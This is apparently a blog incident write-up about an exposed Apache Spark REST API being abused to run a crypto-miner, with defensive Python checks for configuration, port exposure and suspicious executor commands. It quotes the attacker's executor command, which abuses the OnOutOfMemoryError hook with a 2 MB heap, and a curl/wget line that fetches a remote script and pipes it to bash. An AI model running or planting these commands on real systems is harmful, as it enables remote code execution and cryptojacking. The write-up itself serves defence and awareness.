It is well known (or should be) that Spark is not secured by default. It is right there in the docs:

Security in Spark is OFF by default

So you should be well aware that you’ll need to put in the effort to secure your cluster. There are many things to consider: the application UI, the master UI, the worker UIs, data encryption, SSL for the communication between nodes, and so on. I’ll probably write another post covering all of that at some point.

One thing you probably don’t have in mind, though, is that Spark has a REST API through which you can submit jobs. It is not available when running locally (or at least I haven’t managed to make it work), but that makes sense: you need a master to submit to, so you need a cluster.

The Spark setting that enables or disables it is:

spark.master.rest.enabled true

In older Spark versions, it was set to true by default.
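Because the default has changed between versions, it can be worth checking what your own configuration actually says rather than relying on memory. Below is a minimal Python sketch that reads spark-defaults.conf-style text and reports the REST setting. It assumes the master picks the setting up from spark-defaults.conf (it could also be passed another way, e.g. through SPARK_MASTER_OPTS, which this ignores), and the helper names parse_spark_defaults and rest_api_status are hypothetical. The parser is deliberately simplified: it handles "key value" and "key=value" lines and # comments, not every feature of the Java properties format.

```python
from typing import Dict


def parse_spark_defaults(text: str) -> Dict[str, str]:
    """Parse spark-defaults.conf-style text into a {key: value} dict.

    Simplified sketch: handles "key value", "key=value" and "key = value"
    lines plus '#' comments, but not escapes or line continuations.
    """
    props: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)  # split on the first run of whitespace
        key = parts[0]
        value = parts[1] if len(parts) > 1 else ""
        if "=" in key:  # "key=value" written without spaces
            key, _, rest = key.partition("=")
            value = f"{rest} {value}"
        elif value.startswith("="):  # "key = value"
            value = value[1:]
        props[key] = value.strip()
    return props


def rest_api_status(props: Dict[str, str]) -> str:
    """Report how spark.master.rest.enabled is set in the parsed properties."""
    value = props.get("spark.master.rest.enabled")
    if value is None:
        # Not set in this file: the effective default depends on the Spark version.
        return "unset (default depends on Spark version)"
    # Anything other than "true" (case-insensitive) is reported as disabled.
    return "enabled" if value.lower() == "true" else "disabled"


if __name__ == "__main__":
    conf = """
# spark-defaults.conf
spark.master.rest.enabled  true
"""
    print(rest_api_status(parse_spark_defaults(conf)))  # enabled
```

Reporting "unset" instead of guessing a default is intentional: if the key is missing, you still need to check which Spark version the master runs.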

This REST API listens on port 6066 by default and, if that port is reachable, anyone can submit a job to your cluster.
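A quick way to see whether your own master exposes that port to a given network is a plain TCP connect test. The sketch below assumes that is good enough as a first check; port_is_open is a hypothetical helper, and a successful connection only tells you that something is listening on 6066, not that it is Spark's REST submission server.

```python
import socket


def port_is_open(host: str, port: int = 6066, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within `timeout`.

    This only shows that *something* accepts connections on the port; it does
    not confirm that it is Spark's REST submission server.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable, or unresolvable host
        return False
```

For example, port_is_open("your-master-host") (a placeholder for your master's address) run from a machine outside your cluster's network shows roughly what a scanner on that network would see.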





One of our clusters had been behaving strangely recently, and we noticed that a job with the application name “ML exp”, run by a user called “lambda”, had run a short time earlier. It was a short-lived job, but none of us was responsible for it. Alarm bells rang, especially since the cluster was under more load than usual.



Digging into the worker logs, we saw the following:

Spark Executor Command: "/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java" "-cp" "/usr/local/spark/conf/:/usr/local/spark/jars/*" "-Xmx1024M" "-Dspark.driver.port=17841" "-XX:OnOutOfMemoryError=echo somebase64encodedstring |base64 -d|bash" "-Xmx02m" "org.apache.spark.executor.CoarseGrainedExecutorBackend" "--driver-url" "spark://CoarseGrainedScheduler@ip:17841" "--executor-id" "0" "--hostname" "up" "--cores" "20" "--app-id" "app-20201113130818-0005" "--worker-url" "spark://Worker@ip:46609"

Now take a look at two things: the -XX:OnOutOfMemoryError JVM option and the -Xmx (maximum heap size) setting.

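The JVM heap was deliberately set far too low (the later -Xmx02m, i.e. 2 MB, overrides the earlier -Xmx1024M), so an out-of-memory error was practically guaranteed. Once the OOM occurred, the JVM would run the OnOutOfMemoryError command, which decodes the base64 string and pipes the result to bash. In my case, the decoded script fetched another script through curl or wget from some IP and then executed it: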

(curl -s some_ip/sm.sh||wget -q -O- some_ip/sm.sh)|bash
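If you want to look for this pattern in your own worker logs, a small script can take a "Spark Executor Command:" line, work out the effective heap size (HotSpot uses the last -Xmx when the flag is repeated), and decode, without executing, any payload shaped like the echo ... | base64 -d hook above. This is a minimal sketch, not a detection tool: the function names and the 256 MB MIN_SANE_HEAP_MB threshold are hypothetical choices, and the regex only recognizes this one echo/base64 form.

```python
import base64
import re
import shlex
from typing import Optional

# Hypothetical threshold: effective executor heaps below this get flagged.
MIN_SANE_HEAP_MB = 256

# Megabytes per -Xmx unit suffix (k, m, g, t).
_MB_PER_UNIT = {"k": 1 / 1024, "m": 1, "g": 1024, "t": 1024 * 1024}


def heap_mb(flag: str) -> Optional[float]:
    """Convert an -Xmx flag such as '-Xmx1024M' or '-Xmx02m' to megabytes."""
    match = re.fullmatch(r"-Xmx(\d+)([kmgtKMGT]?)", flag)
    if match is None:
        return None
    amount, unit = int(match.group(1)), match.group(2).lower()
    if not unit:  # no suffix means bytes
        return amount / (1024 * 1024)
    return amount * _MB_PER_UNIT[unit]


def inspect_executor_command(cmd: str) -> dict:
    """Flag OnOutOfMemoryError hooks and tiny heaps in an executor command."""
    args = shlex.split(cmd)  # the worker log quotes every argument
    xmx_flags = [a for a in args if a.startswith("-Xmx")]
    # When -Xmx is repeated, the last occurrence is the one that takes effect.
    effective = heap_mb(xmx_flags[-1]) if xmx_flags else None
    hooks = [a.split("=", 1)[1] for a in args
             if a.startswith("-XX:OnOutOfMemoryError=")]
    payloads = []
    for hook in hooks:
        # Decode, never execute, anything shaped like "echo <b64> | base64 -d".
        found = re.search(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d", hook)
        if found:
            try:
                raw = base64.b64decode(found.group(1))
                payloads.append(raw.decode("utf-8", errors="replace"))
            except ValueError:  # binascii.Error: not valid base64
                payloads.append("<could not decode base64>")
    tiny_heap = effective is not None and effective < MIN_SANE_HEAP_MB
    return {
        "effective_xmx_mb": effective,
        "oom_hooks": hooks,
        "decoded_payloads": payloads,
        "needs_review": bool(hooks) or tiny_heap,
    }
```

On a command line like the one above, it would report an effective heap of 2 MB and return the decoded script as text instead of running it. An OnOutOfMemoryError hook on its own is not proof of compromise (some setups use one legitimately, for example to kill the process), which is why the sketch only marks it for review.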

I found the whole thing quite interesting and relatively sophisticated. Unfortunately, I never got hold of the script that was fetched and executed, so my curiosity was not satisfied. Afterwards, the attacker made sure to use only half of the machine’s cores (still running them at 100%, though), and the Spark application they ran was named “ML exp” so as not to draw attention to it. It also set up netstat to start checking for other unattended Spark servers with the REST API open, of course.

The attacker’s goal was crypto-mining (look up kdevtmpfsi), and the cluster was a dev cluster with nothing important on it that was about to be retired, so we just shut it down instead of cleaning up the mess. But I just wanted to say, really “loudly” (yes, CAPS on):

SECURE YOUR SPARK CLUSTERS!

:)

I hope you found this helpful and you enjoyed it! Let me know if you have any horror stories you’d like to share.